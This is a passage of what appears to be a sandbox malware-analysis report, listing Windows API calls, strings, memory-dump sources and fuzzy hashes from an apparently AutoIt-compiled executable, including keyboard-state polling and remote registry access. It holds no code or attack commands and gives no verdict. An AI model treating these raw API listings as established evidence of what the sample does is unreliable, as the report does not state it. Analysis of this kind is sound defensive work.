                                                                                                                • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                                                                • GetKeyState.USER32(00000011), ref: 00453D15
                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                                                                • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                                                                • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 541375521-0
                                                                                                                APIs
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: ConnectRegistry
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 76216097-2761332787
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                                                                • GetParent.USER32(?), ref: 00460D40
                                                                                                                • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                                                • String ID: %s%u
                                                                                                                • API String ID: 1412819556-679674701
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharDriveLowerType
                                                                                                                • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                                                                • API String ID: 2426244813-4176887700
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                  • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                  • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                  • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                                                                • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                                                                • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                                                                • ReleaseCapture.USER32 ref: 0046F589
                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                                                                • API String ID: 2483343779-2060113733
                                                                                                                APIs
                                                                                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                                                                • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                                                                • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                                                                • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                                                                • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                • String ID: 2
                                                                                                                • API String ID: 1331449709-450215437
                                                                                                                APIs
                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                                                                • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                • API String ID: 3030280669-22481851
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                                                                • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen$EnumFromQueryStringValue
                                                                                                                • String ID: ($interface$interface\
                                                                                                                • API String ID: 297354694-3327702407
                                                                                                                • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                                                                • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                                                                • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                                                                • API String ID: 2907320926-41864084
                                                                                                                • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                                                                • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(00000000,00007F04), ref: 00437467
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoad
                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                • API String ID: 2457776203-404129466
                                                                                                                • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                                                                • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                                                                APIs
                                                                                                                • LCMapStringW.KERNEL32(00000000,00000100,004832AC,00000001,00000000,00000000,00000000,00000100,?,?,?,?,?,00000000,00000001,00000000), ref: 0041D253
                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 0041D265
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000100,?,?,?,?,?,00000000,00000001,00000000), ref: 0041D2F1
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,?), ref: 0041D35D
                                                                                                                • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,?), ref: 0041D379
                                                                                                                • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 0041D3B3
                                                                                                                • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 0041D417
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041D43A
                                                                                                                • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,00000000,00000100,?,?,?,?,?), ref: 0041D4CA
                                                                                                                • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,00000100,?,?), ref: 0041D53C
                                                                                                                • LCMapStringA.KERNEL32(?,?,?,?,?,00000100,00000000,00000100,?,?,?,?,?,00000000,00000001,00000000), ref: 0041D589
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1775797328-0
                                                                                                                • Opcode ID: eb41e0d2d1b81e7a32cf906d4b734b1c9ec2c908055d8722ab31c7c9aa7183c2
                                                                                                                • Instruction ID: 1947c5d7a6bd7703781e4ff4e4219a867b2a08f70101b14ec9db93f8b40ae8b3
                                                                                                                • Opcode Fuzzy Hash: eb41e0d2d1b81e7a32cf906d4b734b1c9ec2c908055d8722ab31c7c9aa7183c2
                                                                                                                • Instruction Fuzzy Hash: FFB19AB2C00119BFCF119FA0DC818EF7BB6EB48358B14456BF915A2220D7399DE1DB99
                                                                                                                APIs
                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                                                                • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$Data$AccessUnaccess$Vartype
                                                                                                                • String ID:
                                                                                                                • API String ID: 1349711609-0
                                                                                                                • Opcode ID: 16f99e80be173eecdd1bb573f6b7f825babaa5351af7cc3efc94bb11c862a2f8
                                                                                                                • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                                                                • Opcode Fuzzy Hash: 16f99e80be173eecdd1bb573f6b7f825babaa5351af7cc3efc94bb11c862a2f8
                                                                                                                • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                                                                • DeleteObject.GDI32(00630000), ref: 0046EB4F
                                                                                                                • DestroyIcon.USER32(006C0061), ref: 0046EB67
                                                                                                                • DeleteObject.GDI32(835BD82C), ref: 0046EB7F
                                                                                                                • DestroyWindow.USER32(0041005C), ref: 0046EB97
                                                                                                                • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                                                                • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 802431696-0
                                                                                                                • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                                                                • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                                                                                                • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                                                                                                • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                                                                                                • GetKeyState.USER32(00000011), ref: 00444E77
                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                                                                                                • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                                                                                                • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 541375521-0
                                                                                                                • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                                                • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                                                                                                • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                                                • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CopyVariant$ErrorLast
                                                                                                                • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                                                                • API String ID: 2286883814-4206948668
                                                                                                                • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                                                                • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper
                                                                                                                • String ID: ThumbnailClass
                                                                                                                • API String ID: 3725905772-1241985126
                                                                                                                • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                                                                • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                                                                • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileInfoVersion$QuerySizeValue
                                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                • API String ID: 2179348866-1459072770
                                                                                                                • Opcode ID: 8f115a8dcca366765dccafad874a9911a33c709b0333e454bef2361e27f7839d
                                                                                                                • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                                                                • Opcode Fuzzy Hash: 8f115a8dcca366765dccafad874a9911a33c709b0333e454bef2361e27f7839d
                                                                                                                • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                                                                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString
                                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                                                                • API String ID: 2948472770-2894483878
                                                                                                                • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                                                                • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
